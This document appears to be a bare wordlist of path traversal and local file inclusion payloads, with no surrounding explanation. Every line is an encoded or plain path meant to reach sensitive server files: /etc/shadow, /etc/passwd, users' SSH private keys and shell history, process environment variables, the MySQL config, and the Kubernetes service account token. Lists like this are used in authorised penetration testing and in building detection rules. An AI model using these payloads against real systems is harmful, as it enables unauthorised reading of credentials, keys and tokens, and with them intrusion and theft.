..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fissue
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fknockd.conf
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fmotd
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fmysql%2Fmy.cnf
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%3F
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F..%2F..%2F..%2Fhome%2F%24USER%2F.bash_history
..%2F..%2F..%2F..%2F..%2F..%2Fhome%2F%24USER%2F.ssh%2Fid_rsa
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2F%5B0-9%5D*%2Ffd%2F%5B0-9%5D*
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fcmdline
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fmounts
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fnet%2Farp
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fnet%2Froute
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fnet%2Ftcp
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fsched_debug
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion
..%2F..%2F..%2F..%2F..%2F..%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken
..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fmlocate%2Fmlocate.db
..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fmlocate.db
%2Fetc%2Fgroup
%2Fetc%2Fhosts
%2Fetc%2Fissue
%2Fetc%2Fknockd.conf
%2Fetc%2Fmotd
%2Fetc%2Fmysql%2Fmy.cnf
%2Fetc%2Fpasswd
%2Fetc%2Fpasswd%2500
%2Fetc%2Fpasswd%3F
%2Fetc%2Fshadow
%2Fhome%2F%24USER%2F.bash_history
%2Fhome%2F%24USER%2F.ssh%2Fid_rsa
%2Fproc%2F%5B0-9%5D*%2Ffd%2F%5B0-9%5D*
%2Fproc%2Fcmdline
%2Fproc%2Fmounts
%2Fproc%2Fnet%2Farp
%2Fproc%2Fnet%2Froute
%2Fproc%2Fnet%2Ftcp
%2Fproc%2Fsched_debug
%2Fproc%2Fself%2Fenviron
%2Fproc%2Fversion
%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken
%2Fvar%2Flib%2Fmlocate%2Fmlocate.db
%2Fvar%2Flib%2Fmlocate.db
../../../../../../etc/group
/etc/group
../../../../../../etc/hosts
/etc/hosts
../../../../../../etc/issue
/etc/issue
../../../../../../etc/knockd.conf
/etc/knockd.conf
../../../../../../etc/motd
/etc/motd
../../../../../../etc/mysql/my.cnf
/etc/mysql/my.cnf
../../../../../../etc/passwd
../../../../../../etc/passwd?
../../../../etc/passwd
/etc/passwd
/etc/passwd?
....//....//....//....//....//....//....//etc/passwd%00
../../../../../../etc/passwd%00
/etc/passwd%00
../../../../../../etc/shadow
/etc/shadow
../../../../../../home/$USER/.bash_history
/home/$USER/.bash_history
../../../../../../home/$USER/.ssh/id_rsa
/home/$USER/.ssh/id_rsa
../../../../../../proc/[0-9]*/fd/[0-9]*
/proc/[0-9]*/fd/[0-9]*
../../../../../../proc/cmdline
/proc/cmdline
../../../../../../proc/mounts
/proc/mounts
../../../../../../proc/net/arp
/proc/net/arp
../../../../../../proc/net/route
/proc/net/route
../../../../../../proc/net/tcp
/proc/net/tcp
../../../../../../proc/sched_debug
/proc/sched_debug
../../../../../../proc/self/environ
/proc/self/environ
../../../../../../proc/version
/proc/version
../../../../../../run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/token
../../../../../../var/lib/mlocate.db
/var/lib/mlocate.db
../../../../../../var/lib/mlocate/mlocate.db
/var/lib/mlocate/mlocate.db
